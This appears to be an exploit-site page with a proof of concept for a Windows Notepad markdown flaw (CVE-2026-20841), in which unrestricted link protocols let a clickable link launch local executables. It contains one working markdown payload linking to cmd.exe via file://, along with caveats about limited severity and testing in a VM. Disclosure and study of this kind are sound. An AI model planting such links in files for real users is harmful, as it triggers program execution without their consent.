Share
## https://sploitus.com/exploit?id=05976611-DE96-55AB-8404-FCB1C15A8669
# CVE-2026-20841 - Windows Notepad RCE

PoC for a remote code execution flaw in Windows Notepad's markdown renderer. The markdown engine does not restrict URL protocols, allowing arbitrary protocol handlers to be triggered via clickable links.

## Disclaimers

1. **Not my discovery.** Credit goes to the original researchers on the [MSRC advisory](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841). This is a PoC recreation.
2. **Lower severity than it sounds.** Requires more than one click in most cases (see [Limitations](#limitations)). Built this because "Notepad RCE" is too funny to pass up.

## PoC


###  Local Binary Execution (`file://`)

```markdown
[click](file://C:/windows/system32/cmd.exe)
```

Launches any executable already on disk โ€” `cmd.exe`, `powershell.exe`, `mshta.exe`, etc.

### step 1.
![](./img/poc_1.png)

### step 2.
![](./img/poc_2.png)



## Notes

- Vulnerable Notepad builds are on Uptodown. Verify the digital signature before use.
- **Test only in a VM.**

Stay safe!